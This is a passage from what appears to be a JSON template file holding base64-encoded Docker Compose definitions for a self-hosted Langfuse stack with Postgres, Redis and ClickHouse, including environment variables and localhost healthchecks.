X0RJU0FCTEVfU0lHTlVQPSR7QVVUSF9ESVNBQkxFX1NJR05VUDotdHJ1ZX0nCiAgICAgIC0gJ0hPU1ROQU1FPSR7SE9TVE5BTUU6LTAuMC4wLjB9JwogICAgICAtICdMQU5HRlVTRV9JTklUX09SR19JRD0ke0xBTkdGVVNFX0lOSVRfT1JHX0lEOi1teS1vcmd9JwogICAgICAtICdMQU5HRlVTRV9JTklUX09SR19OQU1FPSR7TEFOR0ZVU0VfSU5JVF9PUkdfTkFNRTotTXkgT3JnfScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9QUk9KRUNUX0lEPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX0lEOi1teS1wcm9qZWN0fScKICAgICAgLSAnTEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU9JHtMQU5HRlVTRV9JTklUX1BST0pFQ1RfTkFNRTotTXkgUHJvamVjdH0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTD0ke0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTDotYWRtaW5AZXhhbXBsZS5jb219JwogICAgICAtICdMQU5HRlVTRV9JTklUX1VTRVJfTkFNRT0ke1NFUlZJQ0VfVVNFUl9MQU5HRlVTRX0nCiAgICAgIC0gJ0xBTkdGVVNFX0lOSVRfVVNFUl9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTEFOR0ZVU0V9JwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgY2xpY2tob3VzZToKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogIHBvc3RncmVzOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxNy1hbHBpbmUnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotbGFuZ2Z1c2UtZGJ9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19VU0VSPSR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xhbmdmdXNlX3Bvc3RncmVzX2RhdGE6L3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1oIGxvY2FsaG9zdCAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogIHJlZGlzOgogICAgaW1hZ2U6ICdyZWRpczo4JwogICAgY29tbWFuZDoKICAgICAgLSBzaAogICAgICAtICctYycKICAgICAgLSAncmVkaXMtc2VydmVyIC0tcmVxdWlyZXBhc3MgIiRTRVJWSUNFX1BBU1NXT1JEX1JFRElTIicKICAgIGVudmlyb25tZW50OgogICAgICAtICdSRURJU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogICAgdm9sdW1lczoKICAgICAgLSAnbGFuZ2Z1c2VfcmVkaXNfZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSByZWRpcy1jbGkKICAgICAgICAtICctYScKICAgICAgICAtICRTRVJWSUNFX1BBU1NXT1JEX1JFRElTCiAgICAgICAgLSBQSU5HCiAgICAgIGludGVydmFsOiAzcwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMTAKICBjbGlja2hvdXNlOgogICAgaW1hZ2U6ICdjbGlja2hvdXNlL2NsaWNraG91c2Utc2VydmVyOmxhdGVzdCcKICAgIHVzZXI6ICcxMDE6MTAxJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ0NMSUNLSE9VU0VfREI9JHtDTElDS0hPVVNFX0RCOi1kZWZhdWx0fScKICAgICAgLSAnQ0xJQ0tIT1VTRV9VU0VSPSR7U0VSVklDRV9VU0VSX0NMSUNLSE9VU0V9JwogICAgICAtICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2xhbmdmdXNlX2NsaWNraG91c2VfZGF0YTovdmFyL2xpYi9jbGlja2hvdXNlJwogICAgICAtICdsYW5nZnVzZV9jbGlja2hvdXNlX2xvZ3M6L3Zhci9sb2cvY2xpY2tob3VzZS1zZXJ2ZXInCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDogJ3dnZXQgLS1uby12ZXJib3NlIC0tdHJpZXM9MSAtLXNwaWRlciBodHRwOi8vbG9jYWxob3N0OjgxMjMvcGluZyB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAo=",
+        "compose": "eC1hcHAtZW52OgogIC0gJ05FWFRBVVRIX1VSTD0ke1NFUlZJQ0VfRlFETl9MQU5HRlVTRX0nCiAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzcWw6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7UE9TVEdSRVNfREI6LWxhbmdmdXNlLWRifScKICAtICdTQUxUPSR7U0VSVklDRV9QQVNTV09SRF9TQUxUfScKICAtICdFTkNSWVBUSU9OX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfNjRfTEFOR0ZVU0V9JwogIC0gJ1RFTEVNRVRSWV9FTkFCTEVEPSR7VEVMRU1FVFJZX0VOQUJMRUQ6LWZhbHNlfScKICAtICdMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTPSR7TEFOR0ZVU0VfRU5BQkxFX0VYUEVSSU1FTlRBTF9GRUFUVVJFUzotZmFsc2V9JwogIC0gJ0NMSUNLSE9VU0VfTUlHUkFUSU9OX1VSTD1jbGlja2hvdXNlOi8vY2xpY2tob3VzZTo5MDAwJwogIC0gJ0NMSUNLSE9VU0VfVVJMPWh0dHA6Ly9jbGlja2hvdXNlOjgxMjMnCiAgLSAnQ0xJQ0tIT1VTRV9VU0VSPSR7U0VSVklDRV9VU0VSX0NMSUNLSE9VU0V9JwogIC0gJ0NMSUNLSE9VU0VfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0NMSUNLSE9VU0V9JwogIC0gQ0xJQ0tIT1VTRV9DTFVTVEVSX0VOQUJMRUQ9ZmFsc2UKICAtICdMQU5HRlVTRV9VU0VfQVpVUkVfQkxPQj0ke0xBTkdGVVNFX1VTRV9BWlVSRV9CTE9COi1mYWxzZX0nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9CVUNLRVQ6LWxhbmdmdXNlfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1JFR0lPTjotYXV0b30nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQUNDRVNTX0tFWV9JRH0nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRU5EUE9JTlR9JwogIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9QUkVGSVg9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUFJFRklYOi1ldmVudHMvfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUkVHSU9OOi1hdXRvfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9BQ0NFU1NfS0VZX0lEfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9FTkRQT0lOVH0nCiAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9QUkVGSVg6LW1lZGlhL30nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VOQUJMRUQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5BQkxFRDotZmFsc2V9JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQlVDS0VUOi1sYW5nZnVzZX0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9QUkVGSVg6LWV4cG9ydHMvfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1JFR0lPTjotYXV0b30nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VORFBPSU5UfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRVhURVJOQUxfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRVhURVJOQUxfRU5EUE9JTlR9JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0FDQ0VTU19LRVlfSUR9JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgLSAnTEFOR0ZVU0VfSU5HRVNUSU9OX1FVRVVFX0RFTEFZX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX1FVRVVFX0RFTEFZX01TOi0xfScKICAtICdMQU5HRlVTRV9JTkdFU1RJT05fQ0xJQ0tIT1VTRV9XUklURV9JTlRFUlZBTF9NUz0ke0xBTkdGVVNFX0lOR0VTVElPTl9DTElDS0hPVVNFX1dSSVRFX0lOVEVSVkFMX01TOi0xMDAwfScKICAtIFJFRElTX0hPU1Q9cmVkaXMKICAtIFJFRElTX1BPUlQ9NjM3OQogIC0gJ1JFRElTX0FVVEg9JHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfScKICAtICdFTUFJTF9GUk9NX0FERFJFU1M9JHtFTUFJTF9GUk9NX0FERFJFU1M6LWFkbWluQGV4YW1wbGUuY29tfScKICAtICdTTVRQX0NPTk5FQ1RJT05fVVJMPSR7U01UUF9DT05ORUNUSU9OX1VSTDotfScKICAtICdORVhUQVVUSF9TRUNSRVQ9JHtTRVJWSUNFX0JBU0U2NF9ORVhUQVVUSFNFQ1JFVH0nCiAgLSAnQVVUSF9ESVNBQkxFX1NJR05VUD0ke0FVVEhfRElTQUJMRV9TSUdOVVA6LXRydWV9JwogIC0gJ0hPU1ROQU1FPSR7SE9TVE5BTUU6LTAuMC4wLjB9JwogIC0gJ0xBTkdGVVNFX0lOSVRfT1JHX0lEPSR7TEFOR0ZVU0VfSU5JVF9PUkdfSUQ6LW15LW9yZ30nCiAgLSAnTEFOR0ZVU0VfSU5JVF9PUkdfTkFNRT0ke0xBTkdGVVNFX0lOSVRfT1JHX05BTUU6LU15IE9yZ30nCiAgLSAnTEFOR0ZVU0VfSU5JVF9QUk9KRUNUX0lEPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX0lEOi1teS1wcm9qZWN0fScKICAtICdMQU5HRlVTRV9JTklUX1BST0pFQ1RfTkFNRT0ke0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9OQU1FOi1NeSBQcm9qZWN0fScKICAtICdMQU5HRlVTRV9JTklUX1VTRVJfRU1BSUw9JHtMQU5HRlVTRV9JTklUX1VTRVJfRU1BSUw6LWFkbWluQGV4YW1wbGUuY29tfScKICAtICdMQU5HRlVTRV9JTklUX1VTRVJfTkFNRT0ke1NFUlZJQ0VfVVNFUl9MQU5HRlVTRX0nCiAgLSAnTEFOR0ZVU0VfSU5JVF9VU0VSX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9MQU5HRlVTRX0nCnNlcnZpY2VzOgogIGxhbmdmdXNlOgogICAgaW1hZ2U6ICdsYW5nZnVzZS9sYW5nZnVzZTozJwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgY2xpY2tob3VzZToKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIDA6ICdORVhUQVVUSF9VUkw9JHtTRVJWSUNFX0ZRRE5fTEFOR0ZVU0V9JwogICAgICAxOiAnREFUQUJBU0VfVVJMPXBvc3RncmVzcWw6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7UE9TVEdSRVNfREI6LWxhbmdmdXNlLWRifScKICAgICAgMjogJ1NBTFQ9JHtTRVJWSUNFX1BBU1NXT1JEX1NBTFR9JwogICAgICAzOiAnRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX1BBU1NXT1JEXzY0X0xBTkdGVVNFfScKICAgICAgNDogJ1RFTEVNRVRSWV9FTkFCTEVEPSR7VEVMRU1FVFJZX0VOQUJMRUQ6LWZhbHNlfScKICAgICAgNTogJ0xBTkdGVVNFX0VOQUJMRV9FWFBFUklNRU5UQUxfRkVBVFVSRVM9JHtMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTOi1mYWxzZX0nCiAgICAgIDY6ICdDTElDS0hPVVNFX01JR1JBVElPTl9VUkw9Y2xpY2tob3VzZTovL2NsaWNraG91c2U6OTAwMCcKICAgICAgNzogJ0NMSUNLSE9VU0VfVVJMPWh0dHA6Ly9jbGlja2hvdXNlOjgxMjMnCiAgICAgIDg6ICdDTElDS0hPVVNFX1VTRVI9JHtTRVJWSUNFX1VTRVJfQ0xJQ0tIT1VTRX0nCiAgICAgIDk6ICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgICAgMTA6IENMSUNLSE9VU0VfQ0xVU1RFUl9FTkFCTEVEPWZhbHNlCiAgICAgIDExOiAnTEFOR0ZVU0VfVVNFX0FaVVJFX0JMT0I9JHtMQU5HRlVTRV9VU0VfQVpVUkVfQkxPQjotZmFsc2V9JwogICAgICAxMjogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgICAgIDEzOiAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1JFR0lPTj0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9SRUdJT046LWF1dG99JwogICAgICAxNDogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogICAgICAxNTogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIDE2OiAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0VORFBPSU5UfScKICAgICAgMTc6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgMTg6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWDotZXZlbnRzL30nCiAgICAgIDE5OiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9CVUNLRVQ6LWxhbmdmdXNlfScKICAgICAgMjA6ICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUkVHSU9OPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1JFR0lPTjotYXV0b30nCiAgICAgIDIxOiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQUNDRVNTX0tFWV9JRH0nCiAgICAgIDIyOiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAgICAgMjM6ICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRU5EUE9JTlR9JwogICAgICAyNDogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogICAgICAyNTogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9QUkVGSVg9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUFJFRklYOi1tZWRpYS99JwogICAgICAyNjogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkFCTEVEPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VOQUJMRUQ6LWZhbHNlfScKICAgICAgMjc6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAyODogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9QUkVGSVg9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUFJFRklYOi1leHBvcnRzL30nCiAgICAgIDI5OiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1JFR0lPTj0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9SRUdJT046LWF1dG99JwogICAgICAzMDogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkRQT0lOVH0nCiAgICAgIDMxOiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VYVEVSTkFMX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0VYVEVSTkFMX0VORFBPSU5UfScKICAgICAgMzI6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9BQ0NFU1NfS0VZX0lEfScKICAgICAgMzM6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAzNDogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9GT1JDRV9QQVRIX1NUWUxFPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0ZPUkNFX1BBVEhfU1RZTEU6LXRydWV9JwogICAgICAzNTogJ0xBTkdGVVNFX0lOR0VTVElPTl9RVUVVRV9ERUxBWV9NUz0ke0xBTkdGVVNFX0lOR0VTVElPTl9RVUVVRV9ERUxBWV9NUzotMX0nCiAgICAgIDM2OiAnTEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM9JHtMQU5HRlVTRV9JTkdFU1RJT05fQ0xJQ0tIT1VTRV9XUklURV9JTlRFUlZBTF9NUzotMTAwMH0nCiAgICAgIDM3OiBSRURJU19IT1NUPXJlZGlzCiAgICAgIDM4OiBSRURJU19QT1JUPTYzNzkKICAgICAgMzk6ICdSRURJU19BVVRIPSR7U0VSVklDRV9QQVNTV09SRF9SRURJU30nCiAgICAgIDQwOiAnRU1BSUxfRlJPTV9BRERSRVNTPSR7RU1BSUxfRlJPTV9BRERSRVNTOi1hZG1pbkBleGFtcGxlLmNvbX0nCiAgICAgIDQxOiAnU01UUF9DT05ORUNUSU9OX1VSTD0ke1NNVFBfQ09OTkVDVElPTl9VUkw6LX0nCiAgICAgIDQyOiAnTkVYVEFVVEhfU0VDUkVUPSR7U0VSVklDRV9CQVNFNjRfTkVYVEFVVEhTRUNSRVR9JwogICAgICA0MzogJ0FVVEhfRElTQUJMRV9TSUdOVVA9JHtBVVRIX0RJU0FCTEVfU0lHTlVQOi10cnVlfScKICAgICAgNDQ6ICdIT1NUTkFNRT0ke0hPU1ROQU1FOi0wLjAuMC4wfScKICAgICAgNDU6ICdMQU5HRlVTRV9JTklUX09SR19JRD0ke0xBTkdGVVNFX0lOSVRfT1JHX0lEOi1teS1vcmd9JwogICAgICA0NjogJ0xBTkdGVVNFX0lOSVRfT1JHX05BTUU9JHtMQU5HRlVTRV9JTklUX09SR19OQU1FOi1NeSBPcmd9JwogICAgICA0NzogJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9JRD0ke0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9JRDotbXktcHJvamVjdH0nCiAgICAgIDQ4OiAnTEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU9JHtMQU5HRlVTRV9JTklUX1BST0pFQ1RfTkFNRTotTXkgUHJvamVjdH0nCiAgICAgIDQ5OiAnTEFOR0ZVU0VfSU5JVF9VU0VSX0VNQUlMPSR7TEFOR0ZVU0VfSU5JVF9VU0VSX0VNQUlMOi1hZG1pbkBleGFtcGxlLmNvbX0nCiAgICAgIDUwOiAnTEFOR0ZVU0VfSU5JVF9VU0VSX05BTUU9JHtTRVJWSUNFX1VTRVJfTEFOR0ZVU0V9JwogICAgICA1MTogJ0xBTkdGVVNFX0lOSVRfVVNFUl9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTEFOR0ZVU0V9JwogICAgICBTRVJWSUNFX0ZRRE5fTEFOR0ZVU0VfMzAwMDogJyR7U0VSVklDRV9GUUROX0xBTkdGVVNFXzMwMDB9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHdnZXQKICAgICAgICAtICctcScKICAgICAgICAtICctLXNwaWRlcicKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjMwMDAvYXBpL3B1YmxpYy9oZWFsdGgnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAzCiAgbGFuZ2Z1c2Utd29ya2VyOgogICAgaW1hZ2U6ICdsYW5nZnVzZS9sYW5nZnVzZS13b3JrZXI6MycKICAgIGVudmlyb25tZW50OgogICAgICAtICdORVhUQVVUSF9VUkw9JHtTRVJWSUNFX0ZRRE5fTEFOR0ZVU0V9JwogICAgICAtICdEQVRBQkFTRV9VUkw9cG9zdGdyZXNxbDovLyR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfToke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QHBvc3RncmVzOjU0MzIvJHtQT1NUR1JFU19EQjotbGFuZ2Z1c2UtZGJ9JwogICAgICAtICdTQUxUPSR7U0VSVklDRV9QQVNTV09SRF9TQUxUfScKICAgICAgLSAnRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX1BBU1NXT1JEXzY0X0xBTkdGVVNFfScKICAgICAgLSAnVEVMRU1FVFJZX0VOQUJMRUQ9JHtURUxFTUVUUllfRU5BQkxFRDotZmFsc2V9JwogICAgICAtICdMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTPSR7TEFOR0ZVU0VfRU5BQkxFX0VYUEVSSU1FTlRBTF9GRUFUVVJFUzotZmFsc2V9JwogICAgICAtICdDTElDS0hPVVNFX01JR1JBVElPTl9VUkw9Y2xpY2tob3VzZTovL2NsaWNraG91c2U6OTAwMCcKICAgICAgLSAnQ0xJQ0tIT1VTRV9VUkw9aHR0cDovL2NsaWNraG91c2U6ODEyMycKICAgICAgLSAnQ0xJQ0tIT1VTRV9VU0VSPSR7U0VSVklDRV9VU0VSX0NMSUNLSE9VU0V9JwogICAgICAtICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgICAgLSBDTElDS0hPVVNFX0NMVVNURVJfRU5BQkxFRD1mYWxzZQogICAgICAtICdMQU5HRlVTRV9VU0VfQVpVUkVfQkxPQj0ke0xBTkdGVVNFX1VTRV9BWlVSRV9CTE9COi1mYWxzZX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OOi1hdXRvfScKICAgICAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQUNDRVNTX0tFWV9JRH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVH0nCiAgICAgIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9GT1JDRV